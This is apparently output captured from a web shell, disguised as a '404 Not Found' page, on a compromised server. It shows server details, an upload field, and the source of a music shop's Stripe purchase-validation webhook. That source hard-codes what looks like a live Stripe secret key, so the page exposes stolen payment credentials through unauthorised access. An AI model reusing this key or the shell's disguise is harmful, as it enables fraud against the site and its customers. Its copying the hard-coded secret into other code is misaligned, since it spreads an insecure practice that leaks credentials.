404 Not Found

T.ME/BIBIL_0DAY

Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory : /home/gositeme/domains/soundstudiopro.com/private_html/webhooks/

Upload File :

Current File : /home/gositeme/domains/soundstudiopro.com/private_html/webhooks/purchase_validation.php

<?php
/**
 * Purchase Validation System
 * Validates that purchases match what was in the cart
 * Should be called after each purchase is processed
 */

require_once __DIR__ . '/../config/database.php';

/**
 * Validate purchase against Stripe metadata
 * Returns array with 'valid' => true/false and 'issues' => array of problems
 */
function validatePurchase($payment_intent_id, $user_id) {
    $pdo = getDBConnection();
    $issues = [];
    
    try {
        // Get Stripe payment intent
        $stripe_secret = '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';
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_intents/' . urlencode($payment_intent_id));
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Authorization: Bearer ' . $stripe_secret]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $stripe_response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($http_code !== 200) {
            $issues[] = "Could not fetch payment intent from Stripe (HTTP {$http_code})";
            return ['valid' => false, 'issues' => $issues];
        }
        
        $payment = json_decode($stripe_response, true);
        $metadata = $payment['metadata'] ?? [];
        
        // Parse expected cart items
        $cart_items_json = $metadata['cart_items'] ?? '[]';
        $cart_items = is_string($cart_items_json) ? json_decode($cart_items_json, true) : $cart_items_json;
        
        if (!is_array($cart_items)) {
            $issues[] = "Cart items metadata is invalid or missing";
            return ['valid' => false, 'issues' => $issues];
        }
        
        // Get expected track IDs
        $expected_track_ids = [];
        foreach ($cart_items as $item) {
            if (isset($item['type']) && $item['type'] === 'track' && isset($item['track_id'])) {
                $expected_track_ids[] = (int)$item['track_id'];
            }
        }
        
        // Also check for single track purchase
        if (isset($metadata['track_id']) && !empty($metadata['track_id'])) {
            $expected_track_ids[] = (int)$metadata['track_id'];
        }
        
        // Get actual purchases from database
        $stmt = $pdo->prepare("
            SELECT track_id 
            FROM track_purchases 
            WHERE stripe_payment_intent_id = ? AND user_id = ?
        ");
        $stmt->execute([$payment_intent_id, $user_id]);
        $actual_track_ids = array_map('intval', array_column($stmt->fetchAll(PDO::FETCH_ASSOC), 'track_id'));
        
        // Compare
        $missing_tracks = array_diff($expected_track_ids, $actual_track_ids);
        $extra_tracks = array_diff($actual_track_ids, $expected_track_ids);
        
        if (!empty($missing_tracks)) {
            $issues[] = "Missing tracks: " . implode(', ', $missing_tracks);
        }
        
        if (!empty($extra_tracks)) {
            $issues[] = "Extra tracks (not in cart): " . implode(', ', $extra_tracks);
        }
        
        if (count($expected_track_ids) !== count($actual_track_ids)) {
            $issues[] = "Count mismatch: Expected " . count($expected_track_ids) . " tracks, found " . count($actual_track_ids);
        }
        
        return [
            'valid' => empty($issues),
            'issues' => $issues,
            'expected' => $expected_track_ids,
            'actual' => $actual_track_ids
        ];
        
    } catch (Exception $e) {
        $issues[] = "Validation error: " . $e->getMessage();
        return ['valid' => false, 'issues' => $issues];
    }
}

/**
 * Store cart snapshot before payment for validation
 */
function storeCartSnapshot($user_id, $cart_items, $payment_intent_id) {
    $pdo = getDBConnection();
    
    try {
        $stmt = $pdo->prepare("
            INSERT INTO cart_snapshots (
                user_id, payment_intent_id, cart_items, created_at
            ) VALUES (?, ?, ?, NOW())
            ON DUPLICATE KEY UPDATE 
                cart_items = VALUES(cart_items),
                created_at = NOW()
        ");
        
        $cart_json = json_encode($cart_items);
        $stmt->execute([$user_id, $payment_intent_id, $cart_json]);
        
        return true;
    } catch (Exception $e) {
        error_log("Failed to store cart snapshot: " . $e->getMessage());
        return false;
    }
}

/**
 * Get cart snapshot for validation
 */
function getCartSnapshot($payment_intent_id) {
    $pdo = getDBConnection();
    
    try {
        $stmt = $pdo->prepare("
            SELECT cart_items 
            FROM cart_snapshots 
            WHERE payment_intent_id = ?
            ORDER BY created_at DESC
            LIMIT 1
        ");
        $stmt->execute([$payment_intent_id]);
        $snapshot = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($snapshot) {
            return json_decode($snapshot['cart_items'], true);
        }
        
        return null;
    } catch (Exception $e) {
        error_log("Failed to get cart snapshot: " . $e->getMessage());
        return null;
    }
}
?>

CasperSecurity Mini